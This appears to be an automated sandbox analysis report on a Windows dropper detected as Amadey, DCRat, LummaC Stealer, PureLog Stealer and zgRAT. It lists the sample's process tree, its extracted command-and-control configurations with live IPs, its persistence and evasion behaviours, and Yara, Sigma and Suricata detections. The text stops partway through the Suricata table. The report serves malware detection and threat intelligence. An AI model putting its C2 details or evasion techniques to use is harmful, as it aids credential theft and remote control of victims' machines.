Edit tour

Windows Analysis Report
download.php.exe.bin.exe

Overview

General Information

Sample name:	download.php.exe.bin.exe
Analysis ID:	1634115
MD5:	fb66ef21a53f5703ffeda9c9824385ea
SHA1:	6f23f367656775e523ec0741c44d8597294d41f3
SHA256:	4b0af09e9ed2bcf3ad65397911edc6a6b81f6ff024c3f038778e53e1bd7b692d
Tags:	exeuser-TornadoAV_dev
Infos:

Detection

Amadey, DCRat, LummaC Stealer, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (creates a PE file in dynamic memory)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadey

Yara detected Amadeys Clipper DLL

Yara detected DCRat

Yara detected LummaC Stealer

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to start a terminal service

Creates multiple autostart registry keys

Drops executable to a common third party application directory

Drops executables to the windows directory (C:\Windows) and starts them

Hides threads from debuggers

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Entry point lies outside standard sections

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Suricata IDS alerts with low severity for network traffic

Tries to resolve many domain names, but no domain seems valid

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

download.php.exe.bin.exe (PID: 6336 cmdline: "C:\Users\user\Desktop\download.php.exe.bin.exe" MD5: FB66EF21A53F5703FFEDA9C9824385EA)

G2C28.exe (PID: 6392 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\G2C28.exe MD5: 3CB1874D4201F7593F6470333EB7FD56)

1Z46i3.exe (PID: 6556 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe MD5: 6A66CCA2A56259EF701AB8F43C7CA624)

rapes.exe (PID: 5756 cmdline: "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: 6A66CCA2A56259EF701AB8F43C7CA624)

2Q0510.exe (PID: 7380 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2Q0510.exe MD5: 2A083F20CA89B09331CBC612523AB190)

rapes.exe (PID: 7248 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 6A66CCA2A56259EF701AB8F43C7CA624)

rundll32.exe (PID: 7576 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)

rundll32.exe (PID: 7668 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)

rapes.exe (PID: 7748 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: 6A66CCA2A56259EF701AB8F43C7CA624)

cuFIzyH.exe (PID: 7928 cmdline: "C:\Users\user\AppData\Local\Temp\10155390101\cuFIzyH.exe" MD5: 63FEDCDE6AA8F912DFF90A919009EEF9)

P2SXMuh.exe (PID: 8108 cmdline: "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe" MD5: 9C19C2D6754FE7072A89AEE0649A71DA)

conhost.exe (PID: 8116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

P2SXMuh.exe (PID: 8164 cmdline: "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe" MD5: 9C19C2D6754FE7072A89AEE0649A71DA)

P2SXMuh.exe (PID: 8176 cmdline: "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe" MD5: 9C19C2D6754FE7072A89AEE0649A71DA)

P2SXMuh.exe (PID: 8184 cmdline: "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe" MD5: 9C19C2D6754FE7072A89AEE0649A71DA)

P2SXMuh.exe (PID: 5532 cmdline: "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe" MD5: 9C19C2D6754FE7072A89AEE0649A71DA)

P2SXMuh.exe (PID: 6512 cmdline: "C:\Users\user\AppData\Local\Temp\10163520101\P2SXMuh.exe" MD5: 9C19C2D6754FE7072A89AEE0649A71DA)

0uzaP1a.exe (PID: 6632 cmdline: "C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe" MD5: 7CD44DFDD8EA0C997B623A3EA4DF2C8A)

conhost.exe (PID: 6628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 6876 cmdline: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)

6z1l5Yn.exe (PID: 7180 cmdline: "C:\Users\user\AppData\Local\Temp\10168050101\6z1l5Yn.exe" MD5: 800AF5CAFA597A540E79853B7DE988DE)

8p5Lrev.exe (PID: 7304 cmdline: "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe" MD5: 3A6133C0DCB1022DABFC8097E647005D)

conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

8p5Lrev.exe (PID: 7356 cmdline: "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe" MD5: 3A6133C0DCB1022DABFC8097E647005D)

8p5Lrev.exe (PID: 7376 cmdline: "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe" MD5: 3A6133C0DCB1022DABFC8097E647005D)

8p5Lrev.exe (PID: 4904 cmdline: "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe" MD5: 3A6133C0DCB1022DABFC8097E647005D)

8p5Lrev.exe (PID: 564 cmdline: "C:\Users\user\AppData\Local\Temp\10168070101\8p5Lrev.exe" MD5: 3A6133C0DCB1022DABFC8097E647005D)

9OJj7W96hi.exe (PID: 4012 cmdline: "C:\Users\user\AppData\Roaming\9OJj7W96hi.exe" MD5: F3EDFF85DE5FD002692D54A04BCB1C09)

conhost.exe (PID: 3316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

1u58lIqYIC.exe (PID: 2016 cmdline: "C:\Users\user\AppData\Roaming\1u58lIqYIC.exe" MD5: 8FF8554B369F49AB17C0C588DCCC7C41)

cmd.exe (PID: 1392 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\NpnD5G3qEA.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 3556 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 4348 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

1u58lIqYIC.exe (PID: 1224 cmdline: "C:\Windows\twain_32\1u58lIqYIC.exe" MD5: 8FF8554B369F49AB17C0C588DCCC7C41)

7T7bCyA.exe (PID: 392 cmdline: "C:\Users\user\AppData\Local\Temp\10168510101\7T7bCyA.exe" MD5: D20D30E7AD30D41DDBB90357112214F2)

ClhN6R8.exe (PID: 1576 cmdline: "C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe" MD5: 3D27865E186DE4D99D25418E0C0789FF)

conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ClhN6R8.exe (PID: 6356 cmdline: "C:\Users\user\AppData\Local\Temp\10168750101\ClhN6R8.exe" MD5: 3D27865E186DE4D99D25418E0C0789FF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://37.230.113.179/7/6/8Dump/authRequest/secureprocessor0Dump/3temporary/Server/DbuploadsMariadb/geoPhp8/0Longpoll/flower/UpdateVoiddb/SqlTrack", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Threatname: Amadey

{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Temp\10169780101\mAtJWNv.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\10169780101\mAtJWNv.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\zY9sqWs[1].exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\user\AppData\Local\Temp\10169820101\zY9sqWs.exe	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
C:\Users\Public\Music\c4zJ2ehOP9IkZ.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Users\user\AppData\Roaming\1u58lIqYIC.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Program Files\Windows Sidebar\fSxaga9GAmNmiIyPxt32.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mAtJWNv[1].exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mAtJWNv[1].exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\twain_32\1u58lIqYIC.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Program Files\Common Files\Adobe\xoQfYYRSvCZVkLtfl.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
C:\Recovery\Gr2GcblCRURZoQ7.exe	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author
0000002C.00000002.3742025173.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000F.00000002.3735827077.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0000000A.00000002.1357003486.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000009.00000002.1343523604.0000000000D51000.00000040.00000001.01000000.00000009.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000017.00000002.2466510789.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000009.00000003.1303062530.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0000000F.00000003.1656544748.0000000005310000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0000002D.00000002.2199825099.00000000010B2000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000011.00000002.1823004473.00000000006F7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000003.00000002.1314521157.0000000000D71000.00000040.00000001.01000000.00000005.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
0000002F.00000002.3736493816.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000002C.00000002.3742025173.0000000002B19000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000026.00000000.2013094755.0000000000DD2000.00000002.00000001.01000000.00000015.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000002B.00000002.3119591927.00000000012BE000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0000002C.00000002.3742025173.00000000030A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
0000000A.00000003.1316415954.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
00000023.00000002.2013652365.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000003.00000003.1274040758.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author
47.2.ClhN6R8.exe.400000.1.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
23.2.P2SXMuh.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
47.2.ClhN6R8.exe.400000.1.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
35.2.8p5Lrev.exe.431080.1.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
23.2.P2SXMuh.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
35.2.8p5Lrev.exe.400000.2.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
43.2.7T7bCyA.exe.3190000.1.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
35.2.8p5Lrev.exe.400000.2.raw.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
38.0.1u58lIqYIC.exe.dd0000.0.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
35.2.8p5Lrev.exe.431080.1.raw.unpack	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
11.2.2Q0510.exe.60000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Click to see the 6 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\10169740101\c881d851ae.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 7748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c881d851ae.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", CommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe, ParentProcessId: 6632, ParentProcessName: 0uzaP1a.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", ProcessId: 6876, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", CommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe, ParentProcessId: 6632, ParentProcessName: 0uzaP1a.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", ProcessId: 6876, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", CommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe, ParentProcessId: 6632, ParentProcessName: 0uzaP1a.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", ProcessId: 6876, ProcessName: wscript.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\10169740101\c881d851ae.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 7748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\c881d851ae.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", CommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10166360101\0uzaP1a.exe, ParentProcessId: 6632, ParentProcessName: 0uzaP1a.exe, ProcessCommandLine: "C:\Windows\System32\wscript.exe" "C:\Users\user\AppData\Local\Temp\pack82.vbe", ProcessId: 6876, ProcessName: wscript.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\download.php.exe.bin.exe, ProcessId: 6336, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T19:57:02.977178+0100	2028371	3	Unknown Traffic	192.168.2.6	49693	104.21.93.43	443	TCP
2025-03-10T19:57:14.973544+0100	2028371	3	Unknown Traffic	192.168.2.6	49695	104.21.80.1	443	TCP
2025-03-10T19:57:18.988895+0100	2028371	3	Unknown Traffic	192.168.2.6	49701	188.114.96.3	443	TCP
2025-03-10T19:57:22.988967+0100	2028371	3	Unknown Traffic	192.168.2.6	49704	188.114.96.3	443	TCP
2025-03-10T19:57:26.988942+0100	2028371	3	Unknown Traffic	192.168.2.6	49707	104.21.96.1	443	TCP
2025-03-10T19:57:30.989378+0100	2028371	3	Unknown Traffic	192.168.2.6	49709	104.21.112.1	443	TCP
2025-03-10T19:57:34.974412+0100	2028371	3	Unknown Traffic	192.168.2.6	49712	104.21.16.1	443	TCP
2025-03-10T19:57:46.895648+0100	2028371	3	Unknown Traffic	192.168.2.6	49702	104.73.234.102	443	TCP
2025-03-10T19:57:51.952760+0100	2028371	3	Unknown Traffic	192.168.2.6	49705	104.73.234.102	443	TCP
2025-03-10T19:57:58.895429+0100	2028371	3	Unknown Traffic	192.168.2.6	49719	104.73.234.102	443	TCP
2025-03-10T19:58:23.965949+0100	2028371	3	Unknown Traffic	192.168.2.6	49721	104.73.234.102	443	TCP
2025-03-10T19:58:25.222385+0100	2028371	3	Unknown Traffic	192.168.2.6	49722	104.21.95.8	443	TCP
2025-03-10T19:58:29.477868+0100	2028371	3	Unknown Traffic	192.168.2.6	49729	104.21.93.43	443	TCP
2025-03-10T19:58:36.967441+0100	2028371	3	Unknown Traffic	192.168.2.6	49741	188.114.96.3	443	TCP
2025-03-10T19:58:46.484928+0100	2028371	3	Unknown Traffic	192.168.2.6	49756	104.73.234.102	443	TCP
2025-03-10T19:58:57.213112+0100	2028371	3	Unknown Traffic	192.168.2.6	49773	104.73.234.102	443	TCP
2025-03-10T19:59:01.465854+0100	2028371	3	Unknown Traffic	192.168.2.6	49778	104.21.80.1	443	TCP
2025-03-10T19:59:02.093327+0100	2028371	3	Unknown Traffic	192.168.2.6	49780	104.73.234.102	443	TCP
2025-03-10T19:59:09.029091+0100	2028371	3	Unknown Traffic	192.168.2.6	49794	104.21.93.43	443	TCP
2025-03-10T19:59:17.682490+0100	2028371	3	Unknown Traffic	192.168.2.6	49808	104.21.16.1	443	TCP
2025-03-10T19:59:18.464225+0100	2028371	3	Unknown Traffic	192.168.2.6	49810	104.73.234.102	443	TCP

ET MALWARE UPX compressed file download possible malware

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T19:57:24.342275+0100	2001046	3	Misc activity	176.113.115.7	80	192.168.2.6	49708	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (collapimga .fun)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T19:58:30.269992+0100	2060410	1	Domain Observed Used for C2 Detected	192.168.2.6	59094	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (earthsymphzony .today)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T19:58:30.472899+0100	2060412	1	Domain Observed Used for C2 Detected	192.168.2.6	53681	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (foresctwhispers .top)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T19:58:30.234941+0100	2060414	1	Domain Observed Used for C2 Detected	192.168.2.6	51971	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (quietswtreams .life)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T19:58:30.303863+0100	2060416	1	Domain Observed Used for C2 Detected	192.168.2.6	61338	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (seizedsentec .online)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-10T19:58:30.281445+0100	2060418	1	Domain Observed Used for C2 Detected	192.168.2.6	51447	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (starrynsightsky .icu)

